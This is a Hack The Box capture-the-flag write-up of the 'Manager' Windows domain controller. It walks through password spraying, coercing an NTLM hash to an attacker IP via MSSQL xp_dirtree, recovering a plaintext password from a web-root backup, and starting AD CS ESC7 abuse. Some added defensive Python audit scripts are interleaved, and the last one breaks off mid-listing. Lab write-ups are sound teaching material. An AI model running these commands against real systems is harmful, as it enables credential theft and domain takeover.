HTB | Manager
Machine - https://app.hackthebox.com/machines/Manager
IP - 10.10.11.236
NMAP
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49693,49722,49795,49865 10.10.11.236 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-12 18:40 IST
Nmap scan report for 10.10.11.236
Host is up (0.55s latency).
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-12 20:11:09Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-12T19:49:44
|_Not valid after:  2055-08-12T19:49:44
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49689/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open     msrpc         Microsoft Windows RPC
49693/tcp open     msrpc         Microsoft Windows RPC
49722/tcp open     msrpc         Microsoft Windows RPC
49795/tcp open     msrpc         Microsoft Windows RPC
49865/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-08-12T20:12:17
|_  start_date: N/A
|_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.26 seconds

Port 80

SMB
┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p ''
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\: 

┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p '' --shares
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\: 
SMB         10.10.11.236    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED

The null session authenticates but cannot list shares; the guest account can:
└─$ netexec smb manager.htb -u 'guest' -p '' --shares          
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\guest: 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL                          Logon server share 

Usernames found via RID brute force
└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\guest: 
SMB         10.10.11.236    445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.10.11.236    445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.10.11.236    445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.10.11.236    445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.10.11.236    445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.236    445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.10.11.236    445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.236    445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.10.11.236    445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.10.11.236    445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.10.11.236    445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.10.11.236    445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.10.11.236    445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.10.11.236    445    DC01             1119: MANAGER\Operator (SidTypeUser)
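The grep/sed one-liner that follows splits names containing spaces (it yields "Domain" and "Protected" from the Domain Users and Protected Users groups). As an added example, not from the original writeup, here is a small parser for the netexec rid-brute line format that keeps SidTypeUser entries whole and separates machine accounts and well-known RIDs; the sample lines are constructed from the output above.

```python
import re
from typing import Dict, List

# Constructed sample: lines in the shape of `netexec smb ... --rid-brute` output
# (single backslashes, as the tool prints them), covering users, groups,
# an alias and a machine account.
SAMPLE_RID_BRUTE = r"""
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\guest:
SMB         10.10.11.236    445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.10.11.236    445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.10.11.236    445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.10.11.236    445    DC01             1119: MANAGER\Operator (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)" at the end of a netexec line.
# The name is matched lazily up to " (SidType", so names with spaces survive.
RID_ENTRY = re.compile(
    r"(?P<rid>\d+): (?P<domain>[^\\\s]+)\\(?P<name>.+?) \((?P<sidtype>SidType\w+)\)\s*$"
)


def parse_rid_brute(text: str) -> List[Dict[str, object]]:
    """Turn rid-brute output into records; banner and auth lines are skipped."""
    entries: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = RID_ENTRY.search(line)
        if not m:
            continue
        entries.append({
            "rid": int(m["rid"]),
            "domain": m["domain"],
            "name": m["name"],
            "sidtype": m["sidtype"],
        })
    return entries


def user_accounts(entries: List[Dict[str, object]], include_machine: bool = False) -> List[str]:
    """Names of SidTypeUser entries; machine accounts (trailing '$') are optional."""
    names: List[str] = []
    for e in entries:
        if e["sidtype"] != "SidTypeUser":
            continue
        if str(e["name"]).endswith("$") and not include_machine:
            continue
        names.append(str(e["name"]))
    return names


def custom_principals(entries: List[Dict[str, object]], min_rid: int = 1000) -> List[Dict[str, object]]:
    """Entries created after domain setup: RIDs below 1000 are well-known built-ins."""
    return [e for e in entries if int(e["rid"]) >= min_rid]


if __name__ == "__main__":
    parsed = parse_rid_brute(SAMPLE_RID_BRUTE)
    print("users:", user_accounts(parsed))
    print("non-builtin:", [e["name"] for e in custom_principals(parsed)])
```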
┌──(anurag㉿anurag)-[~/htb/Manager]
└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute | grep -i 'user' | sed -E 's/.*MANAGER\\([^ ]+).*/\1/'
Administrator
Guest
krbtgt
Domain
Protected
DC01$
SQLServer2005SQLBrowserUser$DC01
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

("Domain" and "Protected" are fragments of the Domain Users and Protected Users group names, which grep -i 'user' also matched; they are not accounts.) We can validate the usernames with kerbrute:
└─$ ./kerbrute userenum --dc 10.10.11.236 -d manager.htb users.txt
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/12/25 - Ronnie Flathers @ropnop
2025/08/12 19:42:06 >  Using KDC(s):
2025/08/12 19:42:06 >   10.10.11.236:88
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Zhong@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       ChinHae@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Ryan@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Administrator@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Raven@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Cheng@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       JinWoo@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       DC01$@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Operator@manager.htb
2025/08/12 19:42:06 >  Done! Tested 10 usernames (9 valid) in 0.642 seconds

With a validated list of users we can try AS-REP Roasting, but nothing comes back: no account has Kerberos pre-authentication disabled.
└─$ impacket-GetNPUsers 'MANAGER.HTB/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.236               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Zhong doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Cheng doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Raven doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JinWoo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ChinHae doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Operator doesn't have UF_DONT_REQUIRE_PREAUTH set
Foothold/Shell
Shell as Raven
Password of the operator
I can do a quick check to see if any of the usernames I’ve collected use their username as their password.
└─$ netexec smb manager.htb -u users.txt -p lower_users.txt --continue-on-success --no-brute 
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Administrator:administrator STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\DC01$:dc01$ STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Raven:raven STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\JinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\ChinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [+] manager.htb\Operator:operator

Operator's password is their username. Let's see which of the services nmap found accept this credential:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u Operator -p  'operator'; echo; done
LDAP        10.10.11.236    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\Operator:operator 
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\Operator:operator 
MSSQL       10.10.11.236    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01             [+] manager.htb\Operator:operator 
WINRM       10.10.11.236    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.236    5985   DC01             [-] manager.htb\Operator:operator

LDAP, SMB and MSSQL accept the credential; WinRM does not.

Bloodhound
└─$ bloodhound-python -u 'Operator' -p 'operator' -d manager.htb -ns 10.10.11.236 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: manager.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.manager.htb
INFO: Done in 01M 33S
INFO: Compressing output into 20250813030440_bloodhound.zip

MSSQL
└─$ impacket-mssqlclient manager.htb/Operator:'operator'@10.10.11.236 -windows-auth                            
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> 

Let's enumerate the databases:
SQL (MANAGER\Operator  guest@master)> SELECT name FROM master..sysdatabases;
name     
------   
master   
tempdb   
model    
msdb     
SQL (MANAGER\Operator  guest@master)> 

All four are default MSSQL databases. xp_cmdshell is not usable by this login (EXECUTE permission denied), but xp_dirtree is:
SQL (MANAGER\Operator  guest@master)> xp_cmdshell whoami
ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
Documents and Settings          1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
SQL2019                         1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0   
SQL (MANAGER\Operator  guest@master)> 

Since xp_dirtree accepts a UNC path, the SQL Server service account will authenticate to whatever host we name; we can try to catch that NTLMv2 response with Responder:
SQL (MANAGER\Operator  guest@master)> xp_dirtree \\10.10.16.7\test
subdirectory   depth   file   
------------   -----   ----   
SQL (MANAGER\Operator  guest@master)> 

Responder output:
[SMB] NTLMv2-SSP Client   : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::MANAGER:88d1619622c7a870:C312956F03ACD2CC3E1374EDD11BC718:[...]

Not able to crack it: the response belongs to the machine account DC01$, whose password is long and random.
Raven’s cred
We found an old zip file
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   
contact.html                          1      1   
css                                   1      0   
images                                1      0   
index.html                            1      1   
js                                    1      0   
service.html                          1      1   
web.config                            1      1   
website-backup-27-07-23-old.zip       1      1   
SQL (MANAGER\Operator  guest@master)> 

Since the archive sits in the web root, we can fetch it over HTTP with wget:
└─$ wget http://10.10.11.236/website-backup-27-07-23-old.zip
--2025-08-13 03:32:58--  http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.zip      100%[=====================================>]   1021K   360KB/s    in 2.8s    
2025-08-13 03:33:01 (360 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

Inside the archive, the hidden .old-conf.xml file contains Raven's credentials:
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Let's check what access we have with the new credentials:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u raven -p  'R4v3nBe5tD3veloP3r!123'; echo; done
LDAP        10.10.11.236    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
MSSQL       10.10.11.236    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
WINRM       10.10.11.236    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.236    5985   DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)

Raven can log in over WinRM (Pwn3d!), which gives us a shell and user.txt:
*Evil-WinRM* PS C:\Users\Raven\Desktop> dir
    Directory: C:\Users\Raven\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/12/2025  12:50 PM             34 user.txt
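The foothold came from a backup archive left in the web root whose hidden config file held a plaintext password. As an added example (not from the writeup), here is a Python check a defender can run over such an archive before it is deployed: it walks every member, dotfiles included, and reports password-like XML elements and connection-string passwords. The archive, file names and values are constructed here; the password strings are placeholders, not values from the machine.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed config shaped like the .old-conf.xml above (placeholder password).
SAMPLE_CONF_XML = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <search-base>dc=manager,dc=htb</search-base>
      <access-user>
         <user>raven@manager.htb</user>
         <password>PLACEHOLDER_PASSWORD</password>
      </access-user>
   </server>
</ldap-conf>
"""

# Constructed web.config with a connection string carrying a password attribute.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="db" connectionString="Server=dc01;User Id=app;Password=PLACEHOLDER_DB_PW;" />
  </connectionStrings>
</configuration>
"""

# Element names that usually carry a secret, and "password=..." fragments
# inside attribute values (connection strings).
SECRET_NAME = re.compile(r"(pass(word|wd)?|pwd|secret|token|api[-_]?key)$", re.I)
INLINE_SECRET = re.compile(r"(?i)\b(password|pwd)\s*=\s*([^;\s]+)")
CONFIG_SUFFIXES = (".xml", ".config", ".conf")

Finding = Tuple[str, str, str]  # (archive member, where found, value)


def build_sample_zip() -> bytes:
    """Build the constructed backup archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("index.html", "<html><body>Manager</body></html>")
        zf.writestr("web.config", SAMPLE_WEB_CONFIG)
        zf.writestr(".old-conf.xml", SAMPLE_CONF_XML)  # dotfile: easy to overlook
    return buf.getvalue()


def secrets_in_xml(member: str, data: bytes) -> List[Finding]:
    """Report secret-looking elements and password= fragments in attributes."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []  # not well-formed XML; out of scope for this checker
    findings: List[Finding] = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # drop any namespace prefix
        text = (elem.text or "").strip()
        if SECRET_NAME.search(tag) and text:
            findings.append((member, tag, text))
        for attr, value in elem.attrib.items():
            for m in INLINE_SECRET.finditer(value):
                findings.append((member, f"{tag}@{attr}", m.group(2)))
    return findings


def scan_backup(zip_bytes: bytes) -> List[Finding]:
    """Walk every file in the archive (dotfiles included) and collect findings."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if member.endswith("/"):
                continue  # directory entry
            if member.lower().endswith(CONFIG_SUFFIXES):
                findings.extend(secrets_in_xml(member, zf.read(member)))
    return findings


if __name__ == "__main__":
    for member, where, value in scan_backup(build_sample_zip()):
        print(f"{member}: {where} = {value[:4]}{'*' * (len(value) - 4)}")
```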
Privilege Escalation
Shell as Administrator
ADCS — ESC 7
└─$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target 10.10.11.236 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
    [+] User ACL Principals             : MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates                   : [!] Could not find any certificate templates

ESC7 covers the case where an attacker obtains highly privileged permissions directly on a CA object within AD CS, or on the CA service itself. These permissions grant significant control over the CA's operations and security. Here Raven holds ManageCa on manager-DC01-CA.
The two primary permissions of concern are:
- Manage CA (CA Administrator / ManageCa): grants extensive control over the CA, including the ability to modify its configuration (e.g., which certificate templates are published), assign CA roles (including Certificate Manager / Officer), start and stop the CA service, and manage CA security. This is the core permission that ESC7 revolves around.
- Manage Certificates (Certificate Manager / Officer): allows a user to approve or deny pending certificate requests and to revoke issued certificates.
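As an added example (not part of the writeup or of Certipy), a Python audit that parses the Permissions block of certipy find's text output and flags ESC7: any principal outside the expected admin groups holding ManageCa or ManageCertificates. The sample block is constructed from the output above; the expected-admin set is an assumption to adjust per environment.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: the CA section of a `certipy find -text` run, trimmed to
# the lines the parser needs (shape taken from the output above).
SAMPLE_CERTIPY_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
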